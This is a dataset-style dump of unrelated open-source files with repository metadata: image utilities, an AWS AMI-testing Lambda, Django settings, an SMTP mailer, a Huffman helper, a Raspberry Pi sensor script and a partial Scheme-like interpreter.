    return img
def save_images(images, batch_size, image_path):
    """Stack a batch of [-1, 1] images into one vertical strip and save it.

    Slots without a corresponding image (when the batch is short) stay black.
    """
    images = (images + 1.) / 2  # back to 0 ~ 1
    h, w = images.shape[1], images.shape[2]
    canvas = np.zeros((h * batch_size, w, 3))
    for idx, image in enumerate(images):
        top = h * idx
        canvas[top:top + h, 0:w, :] = image
    return misc.imsave(image_path, canvas)
def show_all_variables():
    """Print a per-variable size breakdown of all trainable TF variables."""
    model_vars = tf.trainable_variables()
    slim.model_analyzer.analyze_vars(model_vars, print_info=True)
def check_folder(log_dir):
    """Ensure *log_dir* exists on disk; the path is returned unchanged."""
    if os.path.exists(log_dir):
        return log_dir
    os.makedirs(log_dir)
    return log_dir
| [
"a0928249471@gmail.com"
] | a0928249471@gmail.com |
a53d180b2d0604cbcd6624d4c8f734141673ae1d | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/bob/fd662cf898124b46b21e2ca30d117042.py | 6281c95b5842337f10d96aec50200b80c8cd2e1d | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 346 | py | def hey(input):
has_alpha = False
has_num = False
for i in input:
if i.isalpha():
has_alpha = True
elif i.isnumeric():
has_num = True
if not has_alpha and not has_num:
return "Fine. Be that way!"
if input.upper() == input and has_alpha:
return "Whoa, chill out!"
if input[-1] == "?":
return "Sure."
return "Whatever."
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
4b8f9da92a1bc4cbf9f59d86ffaba208a6c9a530 | 72b57850bf0ef7480a9a5dfc38e428371631a00d | /amilaunch/amilaunch.py | c5b6dbe8c69b950521d8216dd0a31a9645fce4c2 | [
"Apache-2.0"
] | permissive | 4n6ir/matchmeta | e92ceb005c928708273d3d8d9d538b8a44f110e5 | 6ec4f5094e359f7861e828eab17953704cc4a6e8 | refs/heads/main | 2023-03-18T15:51:55.266987 | 2023-03-13T01:54:49 | 2023-03-13T01:54:49 | 325,153,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,063 | py | import boto3
import json
import logging
import os
import uuid
from boto3.dynamodb.conditions import Key
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def handler(event, context):
    """Drive the AMI pipeline: launch a test stack for the next queued AMI,
    or health-check / tear down the one currently running.

    When the AMI_ID SSM parameter still holds the VALIDTEST sentinel, the
    next DynamoDB item with running == 'ON' is selected, its image id,
    instance type and architecture are written to SSM, and a fresh
    CloudFormation stack is created.  Otherwise the running stack is
    checked (rollback state, SSM agent connectivity) and, on failure, the
    item is marked ERROR, the stack deleted, and the parameters reset.
    """
    cfn_client = boto3.client('cloudformation')
    dynamodb = boto3.resource('dynamodb')
    table = dynamodb.Table(os.environ['DYNAMODB_TABLE'])
    parameter = boto3.client('ssm')

    ami_response = parameter.get_parameter(
        Name = os.environ['AMI_ID']
    )
    ami_value = ami_response['Parameter']['Value']

    # (the original also fetched INSTANCE_TYPE here but never used it)
    deploy_response = parameter.get_parameter(
        Name = os.environ['DEPLOY_ARN']
    )
    deploy_value = deploy_response['Parameter']['Value']

    if ami_value == os.environ['VALIDTEST']:
        # No image under test: pick the next queued AMI and launch a stack.
        response = table.query(
            KeyConditionExpression = Key('pk').eq('AMAZON#')
        )
        responsedata = response['Items']
        while 'LastEvaluatedKey' in response:
            response = table.query(
                KeyConditionExpression = Key('pk').eq('AMAZON#'),
                ExclusiveStartKey = response['LastEvaluatedKey']
            )
            # BUG FIX: Items is a list — the original called .update(),
            # which lists do not have; extend() appends the next page.
            responsedata.extend(response['Items'])
        for item in responsedata:
            if item['running'] == 'ON':
                # pick instance type / arch string for the image architecture
                if item['architecture'] == 'x86_64':
                    ec2type = 't3a.small'
                    archtype = 'x86_64'
                elif item['architecture'] == 'arm64':
                    ec2type = 't4g.small'
                    archtype = 'aarch64'
                parameter.put_parameter(
                    Name = os.environ['AMI_ID'],
                    Description = 'AMI Pipeline Image Id',
                    Value = item['imageid'],
                    Overwrite = True
                )
                parameter.put_parameter(
                    Name = os.environ['INSTANCE_TYPE'],
                    Description = 'AMI Pipeline Instance Type',
                    Value = ec2type,
                    Overwrite = True
                )
                parameter.put_parameter(
                    Name = os.environ['ARCH_TYPE'],
                    Description = 'AMI Pipeline Instance Type',
                    Value = archtype,
                    Overwrite = True
                )
                uid = uuid.uuid1()
                cfn_client.create_stack(
                    StackName = 'runmeta-'+str(uid),
                    TemplateURL = os.environ['TEMPLATE'],
                    Capabilities = ['CAPABILITY_IAM'],
                    RoleARN = deploy_value
                )
                parameter.put_parameter(
                    Name = os.environ['STACK_NAME'],
                    Value = 'runmeta-'+str(uid),
                    Type = 'String',
                    Overwrite = True
                )
                break   # only one AMI under test at a time
    else:
        # An image is under test: check its stack and instance health.
        stack_response = parameter.get_parameter(
            Name = os.environ['STACK_NAME']
        )
        stack_value = stack_response['Parameter']['Value']

        def _fail_and_reset():
            # Mark the AMI item ERROR, tear the stack down and restore the
            # SSM parameters to their idle values.  (The original repeated
            # this whole sequence twice.)
            table.update_item(
                Key = {
                    'pk': 'AMAZON#',
                    'sk': 'AMAZON#'+ami_value
                },
                UpdateExpression = 'set running = :r',
                ExpressionAttributeValues = {
                    ':r': 'ERROR',
                },
                ReturnValues = 'UPDATED_NEW'
            )
            cfn_client.delete_stack(
                StackName = stack_value,
                RoleARN = deploy_value
            )
            parameter.put_parameter(
                Name = os.environ['AMI_ID'],
                Description = 'AMI Pipeline Image Id',
                Value = os.environ['VALIDTEST'],
                Overwrite = True
            )
            parameter.put_parameter(
                Name = os.environ['INSTANCE_TYPE'],
                Description = 'AMI Pipeline Instance Type',
                Value = 'EMPTY',
                Overwrite = True
            )
            parameter.put_parameter(
                Name = os.environ['ARCH_TYPE'],
                Description = 'AMI Pipeline Instance Type',
                Value = 'EMPTY',
                Overwrite = True
            )

        response = cfn_client.describe_stacks()
        for stack in response['Stacks']:
            if 'ROLLBACK_COMPLETE' in stack['StackStatus']:
                logger.info('ERROR '+str(stack))
                if stack['StackName'] == stack_value:
                    _fail_and_reset()

        ec2_client = boto3.client('ec2')
        response = ec2_client.describe_instances(
            # BUG FIX: the original put both filters into ONE dict with
            # duplicate 'Name'/'Values' keys, so the instance-state filter
            # was silently discarded; each filter needs its own dict.
            Filters=[
                {
                    'Name': 'instance-state-name',
                    'Values': [
                        'running',
                    ]
                },
                {
                    'Name': 'image-id',
                    'Values': [
                        ami_value,
                    ]
                }
            ]
        )
        ec2status = parameter.get_connection_status(
            Target = response['Reservations'][0]['Instances'][0]['InstanceId']
        )
        if ec2status['Status'] == 'notconnected':
            # instance never registered with SSM: treat as a failed AMI
            _fail_and_reset()
    return {
        'statusCode': 200,
        'body': json.dumps('Launch Amazon Linux AMI')
    }
"84751182+jblukach@users.noreply.github.com"
] | 84751182+jblukach@users.noreply.github.com |
b20e6db9ec4eac90633fcf7179a14e44c6974727 | a06918243fe887867d226ae28c341f7cd8728677 | /config/settings.py | bad81065ce1aa45e06c0f457e95279dc5df791d1 | [] | no_license | z1song/django_project | 97cb4b1cd2978ce7af196027e88cc19e8f190dc7 | 16476dfa5b36141206f78cefd0c76fbcda5693f0 | refs/heads/master | 2023-02-02T13:52:13.008003 | 2020-12-20T12:52:12 | 2020-12-20T12:52:12 | 319,083,226 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,330 | py | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and load
# it from the environment before any real deployment.
SECRET_KEY = 'bfsnb+arscyz%g3hoy%rh$*%q@=e_mp=w^w61awk1ia+xvvf(m'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
# NOTE(review): '*' accepts any Host header; restrict to real hostnames in
# production to avoid Host-header attacks.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'home',
    'polls',
    'bookmark',
    'blog',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, "templates")],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
| [
"wcn07102@naver.com"
] | wcn07102@naver.com |
9005faf81f6743fc7239e96b95cffe85cde7e46d | 72985bbc5bfc4126340eef54c7446b97e6e8d0fd | /orangejuice/utils/orangemail.py | c5845aef1311be2b759034b8add22c6798fc79f9 | [] | no_license | Larryrun80/OrangePlus | c3d09783b80ac356c6008dcfaa5e695b41be076b | 6079d68d9011195eaae1b95cc38db11d0b3e2c69 | refs/heads/master | 2021-01-21T13:11:13.694958 | 2015-07-31T09:23:04 | 2015-07-31T09:23:04 | 26,968,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,096 | py | #!/usr/bin/env python
#Filename: orangejuice/utils/orangemailer.py
import configparser
import os
import smtplib
import email.utils
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
class OrangeMail:
    """Small helper around smtplib/email that simplifies sending mail.

    Connection settings (SMTP host, user, password) are read from
    conf/orangejuice.conf next to the package root; ``section_name``
    selects which config section to use.
    """
    def __init__(self, section_name):
        # Read config file and init mail settings / SMTP session.
        self._config_file = os.path.split(os.path.dirname(__file__))[0]
        self._config_file += '/conf/orangejuice.conf'
        config = configparser.ConfigParser()
        config.read(self._config_file)
        self.smtp = smtplib.SMTP(config.get(section_name, 'SMTP'))
        self.smtp.login(config.get(section_name, 'User'),
                        config.get(section_name, 'Password'))
        self.send_from = config.get(section_name, 'User')
    def send_mail(self, send_to, subject, text, files=None):
        """Send a plain-text mail, optionally with attachments.

        :param send_to: list of recipient addresses
        :param subject: subject line
        :param text: plain-text body
        :param files: optional list of file paths to attach
        :raises RuntimeError: if ``send_to`` or ``files`` is not a list

        NOTE: the SMTP session is closed after sending, so one instance
        can send only a single message (existing behavior, kept as-is).
        """
        # Check input data format before doing any work.
        if files and not isinstance(files, list):
            raise RuntimeError('Invalid Files, Should Pass a List!')
        if not isinstance(send_to, list):
            raise RuntimeError('Invalid Send_To Info, Should Pass a List!')
        # Build mail envelope.
        msg = MIMEMultipart()
        msg['From'] = self.send_from
        msg['To'] = email.utils.COMMASPACE.join(send_to)
        msg['Subject'] = subject
        msg.attach(MIMEText(text))
        # Attach files to mail if a filename list was passed.
        if files:
            for path in files:
                attachment = MIMEBase('application', 'octet-stream')
                # Context manager fixes the old file-handle leak
                # (open(...).read() never closed the file).
                with open(path, "rb") as fp:
                    attachment.set_payload(fp.read())
                encoders.encode_base64(attachment)
                attachment.add_header('Content-Disposition',
                                      'attachment',
                                      filename=os.path.split(path)[1])
                msg.attach(attachment)
        # Send mail and quit.
        self.smtp.send_message(msg)
        self.smtp.quit()
| [
"larryrun80@gmail.com"
] | larryrun80@gmail.com |
def avg_length(tree, freq_dict):
    """ Return the number of bits per symbol required to compress text
    made of the symbols and frequencies in freq_dict, using the Huffman tree.
    @param HuffmanNode tree: a Huffman tree rooted at node 'tree'
    @param dict(int,int) freq_dict: frequency dictionary
    @rtype: float
    >>> freq = {'a': 2, 'b': 7, 'c': 1}
    >>> left = HuffmanNode(None, HuffmanNode('a'), HuffmanNode('b'))
    >>> right = HuffmanNode('c')
    >>> tree = HuffmanNode(None, left, right)
    >>> avg_length(tree, freq)
    1.9
    """
    # Total number of symbol occurrences in the text.
    sum_frequencies = sum(freq_dict.values())
    codes = get_codes(tree)
    # BUG FIX: the old code built len(code) and frequency lists by iterating
    # two *different* dicts and paired them by index, which matches a code
    # length with the frequency of a different symbol whenever the dicts'
    # iteration orders differ.  Pair by symbol key instead.
    sum_bits = sum(len(codes[symbol]) * freq_dict[symbol] for symbol in freq_dict)
    return sum_bits / sum_frequencies
| [
"xinbo.tian@mail.utoronto.ca"
] | xinbo.tian@mail.utoronto.ca |
005f638d6130c9043c19036ceb805b865dcb3fe6 | 8d96dd3abef64eebdcfdd1b6cf508275d63e8caf | /serverTest.py | b3807afca1e09a826227a14b3bb68cc332aabbae | [] | no_license | arcosin/ANP_ProcNode | dcd7b04435827f66dc985557b8e3510f7c412b6b | ca7af8677bc5a4787b8df39824b556fb19a6387d | refs/heads/master | 2023-04-14T14:26:41.835884 | 2021-04-20T06:08:04 | 2021-04-20T06:08:04 | 339,306,146 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | import client , server
def main():
    """Spin up a proxying Server node for one file and start serving."""
    print("start")
    port_number = 61619
    file_name = "Naruto.jpg"
    node_id = "Server"
    node = server.Server(port_number, file_name, node_id)
    node.createProxy()
    node.start()
if __name__ == '__main__':
main() | [
"VardhanAditya123@github.com"
] | VardhanAditya123@github.com |
15e51efc95ece00ddf71f40f02725436fbf5c154 | f29d67589d29844abd82176e2ba9e4514fde40f0 | /0109_light/src/RaspberryPI/light.py | 0a3ecc44d32e5b402dc6e8549d35e0e6e47d1b36 | [] | no_license | FaBoPlatform/FaBo | b92315e61226f020d1e6409387fc35fa3b255eb5 | f0a26d2747e5dbf67cb1311c6d9ac06bbc981a64 | refs/heads/master | 2023-09-01T06:41:43.500410 | 2023-08-30T08:47:49 | 2023-08-30T08:47:49 | 28,205,523 | 33 | 6 | null | 2021-02-22T06:16:08 | 2014-12-18T23:06:39 | Objective-C | UTF-8 | Python | false | false | 1,124 | py | #!/usr/bin/env python
# coding: utf-8
#
# FaBo Brick Sample
#
# #109 Light Brick
#
# Reads the light Brick connected to the A0 connector and uses the reading
# to adjust the brightness of the LED Brick on the GPIO4 connector.
import RPi.GPIO as GPIO
import spidev
import time
import sys
# Light sensor is on ADC channel A0.
LIGHTPIN = 0
# LED is connected to the GPIO4 connector.
LEDPIN = 4
# Configure the GPIO port (BCM numbering, LED pin as output).
GPIO.setwarnings(False)
GPIO.setmode( GPIO.BCM )
GPIO.setup( LEDPIN, GPIO.OUT )
# Drive the LED with 100 Hz PWM.
LED = GPIO.PWM(LEDPIN, 100)
# Initialize with a 0% duty cycle (LED off).
LED.start(0)
# Open SPI bus 0, device 0 for the ADC.
spi = spidev.SpiDev()
spi.open(0,0)
def readadc(channel):
    """Read one 10-bit sample from the SPI ADC on the given channel.

    The [start, (single-ended | channel) << 4, pad] frame looks like an
    MCP3008-style read — TODO confirm against the board schematic.
    """
    raw = spi.xfer2([1, (8 + channel) << 4, 0])
    # Low two bits of the second byte are the high bits of the result.
    return ((raw[1] & 3) << 8) + raw[2]
def arduino_map(x, in_min, in_max, out_min, out_max):
    """Linearly rescale x from [in_min, in_max] to [out_min, out_max]
    using integer floor math, like Arduino's map() function."""
    span_out = out_max - out_min
    span_in = in_max - in_min
    return (x - in_min) * span_out // span_in + out_min
if __name__ == '__main__':
    try:
        # Poll the sensor ~100x/second and map the 10-bit reading (0..1023)
        # to a PWM duty cycle (0..100).
        while True:
            data = readadc(LIGHTPIN)
            print("adc : {:8} ".format(data))
            value = arduino_map(data, 0, 1023, 0, 100)
            LED.ChangeDutyCycle(value)
            time.sleep( 0.01 )
    except KeyboardInterrupt:
        # Ctrl-C: stop PWM and release GPIO/SPI resources before exiting.
        LED.stop()
        GPIO.cleanup()
        spi.close()
        sys.exit(0)
| [
"hideki.yamauchi@gmail.com"
] | hideki.yamauchi@gmail.com |
ed729caf1ecd7de60eb6f11108f66492b349a339 | b9d4045527d5ac750bc9d1ebe4dbfd50320a66fc | /mysite/settings.py | 156b2bf7c724934ec03a360f984c649044f087b0 | [] | no_license | ninalittorin/my-first-blog | 18eaffeb5258ae8b9db20205954725c83a3f9ad0 | e719c18310c0b975ab433e5608aca07c85cfa54c | refs/heads/master | 2020-04-17T11:20:47.953704 | 2019-01-19T14:13:45 | 2019-01-19T14:13:45 | 166,536,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,196 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.0.10.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and load
# it from the environment before any real deployment.
SECRET_KEY = '+n-&!ljdf1uwy+co#%*1jpt($r-#o@@8*n6!k@+$gz1rb$m_-g'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Local development plus any PythonAnywhere subdomain.
ALLOWED_HOSTS = ['127.0.0.1','.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Stockholm'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"ninalittorin@gmail.com"
] | ninalittorin@gmail.com |
0e9d848536ac21073907a772967755033d617ca8 | 65c5ca0db75f56118de52494bbcce68a6fea0f66 | /hw07_CuteInterpreter.py | a058ef6b1cffa69f05c8402b0598f852b2b17e69 | [] | no_license | ohheebin/PL_24-Cute_Interperter | 69115a7e1313e02262c85c42f53cd67c4aaff5aa | b14174f0eaf448fa730cac0fc6eaaf63566698bc | refs/heads/master | 2020-05-29T11:42:01.758177 | 2016-05-29T15:51:08 | 2016-05-29T15:51:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,158 | py | # -*- coding: utf-8 -*-
from string import letters, digits
class CuteType:
    # Numeric token-type codes used by the scanner's DFA: the accepting
    # state number of the DFA doubles as the token's type code.
    INT=1
    ID=4
    MINUS=2
    PLUS=3
    L_PAREN=5
    R_PAREN=6
    TRUE=8
    FALSE=9
    TIMES=10
    DIV=11
    LT=12
    GT=13
    EQ=14
    APOSTROPHE=15
    # Keyword codes occupy the contiguous range 20..30 (see is_type_keyword).
    DEFINE=20
    LAMBDA=21
    COND=22
    QUOTE=23
    NOT=24
    CAR=25
    CDR=26
    CONS=27
    ATOM_Q=28
    NULL_Q=29
    EQ_Q=30
    KEYWORD_LIST=('define', 'lambda', 'cond','quote', 'not', 'car', 'cdr', 'cons', 'atom?', 'null?', 'eq?' )
    BINARYOP_LIST=(DIV, TIMES, MINUS, PLUS, LT, GT, EQ)
    BOOLEAN_LIST=(TRUE, FALSE)
def check_keyword(token):
    """
    Return True when *token* (compared case-insensitively) is one of the
    Cute reserved words in CuteType.KEYWORD_LIST.

    :type token: str
    """
    return token.lower() in CuteType.KEYWORD_LIST
def is_type_keyword(token):
    """True when the token's type code falls in the keyword range 20..30."""
    return 20 <= token.type <= 30
def _get_keyword_type(token):
    """Map a keyword lexeme to its CuteType code (KeyError for non-keywords)."""
    keyword_types = {
        'define': CuteType.DEFINE,
        'lambda': CuteType.LAMBDA,
        'cond': CuteType.COND,
        'quote': CuteType.QUOTE,
        'not': CuteType.NOT,
        'car': CuteType.CAR,
        'cdr': CuteType.CDR,
        'cons': CuteType.CONS,
        'atom?': CuteType.ATOM_Q,
        'null?': CuteType.NULL_Q,
        'eq?': CuteType.EQ_Q,
    }
    return keyword_types[token]
# Reverse map: CuteType numeric code -> attribute name (e.g. 1 -> 'INT'),
# built by reflecting over CuteType's non-dunder attributes.
CUTETYPE_NAMES=dict((eval(attr, globals(), CuteType.__dict__), attr) for attr in dir(CuteType()) if not callable(attr) and not attr.startswith("__"))
def is_type_binaryOp(token):
    """
    True when the token is a binary operator (+ - * / < > =).

    :type token: Token
    """
    return token.type in CuteType.BINARYOP_LIST
def is_type_boolean(token):
    """
    True when the token is a boolean literal (#T / #F).

    :type token: Token
    """
    return token.type in CuteType.BOOLEAN_LIST
class Token(object):
    """A scanned lexeme tagged with its CuteType code."""
    def __init__(self, type, lexeme):
        """
        :type type: CuteType
        :type lexeme: str
        """
        self.type=type
        self.lexeme=lexeme
    def __str__(self):
        # Removed the dead "if self is None: return None" guard: self can
        # never be None in a bound call, and __str__ must return a str.
        return "[" + CUTETYPE_NAMES[self.type] + ": " + self.lexeme + "]"
    def __repr__(self):
        return str(self)
class CuteScanner(object):
    """Splits a whitespace-separated Cute source string into Tokens using a
    small character-level DFA (accepting states double as CuteType codes).

    :type token_iter:iter
    """
    transM={}  # unused legacy transition table; kept for compatibility
    def __init__(self, source):
        """
        :type source:str
        """
        source=source.strip()
        token_list=source.split(" ")
        self.token_iter=iter(token_list)
    def get_state(self, old_state, trans_char):
        """One DFA step: next state for *trans_char* from *old_state*.

        BUG FIX: the old code compared ints/one-char strings with ``is`` /
        ``is not`` (e.g. ``old_state is 0``, ``k is 'T'``), which only works
        because CPython interns them and raises SyntaxWarning on 3.8+;
        replaced with ``==`` / ``!=``.
        """
        if trans_char in digits+letters+'?':
            return {
                0: {k: 1 if k in digits else 4 for k in digits+letters},
                1: {k: 1 for k in digits},
                2: {k: 1 for k in digits},
                3: {k: 1 for k in digits},
                4: {k: 4 if k != '?' else 16 for k in digits+letters+'?'},
                7: {k: 8 if k == 'T' else 9 for k in ['T', 'F']}
            }[old_state][trans_char]
        if old_state == 0:
            return {
                '(': 5, ')': 6,
                '+': 3, '-': 2,
                '*': 10, '/': 11,
                '<': 12, '=': 14,
                '>': 13, "'": 15,
                '#': 7
            }[trans_char]
    def next_token(self):
        """Scan and return the next Token, or None at end of input."""
        state_old=0
        temp_token=next(self.token_iter, None)
        if temp_token is None : return None
        for temp_char in temp_token:
            state_old=self.get_state(state_old, temp_char)
        if check_keyword(temp_token):
            result = Token(_get_keyword_type(temp_token), temp_token)
        else:
            result=Token(state_old, temp_token)
        return result
    def tokenize(self):
        """Scan the whole source and return the list of Tokens."""
        tokens=[]
        while True:
            t=self.next_token()
            if t is None :break
            tokens.append(t)
        return tokens
class TokenType():
    # Parse-tree node type codes.  Mirrors CuteType except that the paren
    # tokens are replaced by a single structural LIST type.
    INT=1
    ID=4
    MINUS=2
    PLUS=3
    LIST=5
    TRUE=8
    FALSE=9
    TIMES=10
    DIV=11
    LT=12
    GT=13
    EQ=14
    APOSTROPHE=15
    DEFINE=20
    LAMBDA=21
    COND=22
    QUOTE=23
    NOT=24
    CAR=25
    CDR=26
    CONS=27
    ATOM_Q=28
    NULL_Q=29
    EQ_Q=30
# Reverse map: TokenType numeric code -> attribute name, used for printing.
NODETYPE_NAMES = dict((eval(attr, globals(), TokenType.__dict__), attr) for attr in dir(TokenType()) if not callable(attr) and not attr.startswith("__"))
class Node (object):
    # A parse-tree node that is also a singly-linked-list cell:
    # ``value`` holds the payload (lexeme, or the head Node of a sub-list
    # when type is LIST) and ``next`` points to the next sibling.
    def __init__(self, type, value=None):
        self.next = None
        self.value = value
        self.type = type
    def set_last_next(self, next_node):
        # Append next_node at the end of this sibling chain (recursive walk).
        if self.next is not None:
            self.next.set_last_next(next_node)
        else : self.next=next_node
    def get_tail(self):
        # Return the last node of this (possibly nested) list structure.
        def get_list_tail(node):
            """
            :type node: Node
            """
            if node.type is TokenType.LIST:
                return get_list_tail(node.value)
            else:
                if node.next is None:
                    return node
                return get_list_tail(node.next)
        if self.type is TokenType.LIST:
            return get_list_tail(self)
        return self
    def __str__(self):
        # Render this node and, recursively, its siblings.
        result = ""
        if self.type is TokenType.ID:
            result = "["+self.value+"]"
        elif self.type is TokenType.INT:
            result = str(self.value)
        elif self.type is TokenType.LIST:
            # A quoted list prints without its own parens; the quote handles it.
            if self.value is not None and self.value.type is TokenType.QUOTE:
                result = str(self.value)
            else:
                result = "("+str(self.value)+")"
        elif self.type is TokenType.QUOTE:
            result = "'"
        else:
            result = "["+NODETYPE_NAMES[self.type]+"]"
        if self.next is None:
            return result
        else: return result+" "+str(self.next)
class BasicPaser(object):
    # Recursive-descent parser: turns the scanner's Token list into a tree
    # of Nodes.  (Class name keeps the original "Paser" spelling because
    # external callers reference it.)
    def __init__(self, token_list):
        """
        :type token_list:list
        :param token_list:
        :return:
        """
        self.token_iter=iter(token_list)
    def _get_next_token(self):
        """
        Return the next Token or None when the stream is exhausted.
        :rtype: Token
        """
        next_token=next(self.token_iter, None)
        if next_token is None: return None
        return next_token
    def parse_expr(self):
        """
        Parse and return one expression as a Node (None at end of input).
        :rtype : Node
        """
        token =self._get_next_token()
        """:type :Token"""
        if token==None: return None
        result = self._create_node(token)
        return result
    def _create_node(self, token):
        # Dispatch on the token type; R_PAREN maps to None, which
        # _parse_expr_list uses as its end-of-list sentinel.
        if token is None: return None
        if token.type is CuteType.INT: return Node(TokenType.INT, token.lexeme)
        elif token.type is CuteType.ID: return Node(TokenType.ID, token.lexeme)
        elif token.type is CuteType.L_PAREN: return Node(TokenType.LIST, self._parse_expr_list())
        elif token.type is CuteType.R_PAREN: return None
        elif token.type is CuteType.APOSTROPHE:
            # 'expr  ==>  (QUOTE expr) wrapped in a LIST node.
            q_node = Node(TokenType.QUOTE)
            q_node.next=self.parse_expr()
            new_list_node = Node(TokenType.LIST, q_node)
            return new_list_node
        elif token.type is CuteType.QUOTE:
            q_node = Node(TokenType.QUOTE)
            return q_node
        elif is_type_binaryOp(token) or \
            is_type_keyword(token) or \
            is_type_boolean(token):
            return Node(token.type)
        else:
            return None
    def _parse_expr_list(self):
        # Parse sibling expressions until the R_PAREN sentinel (None).
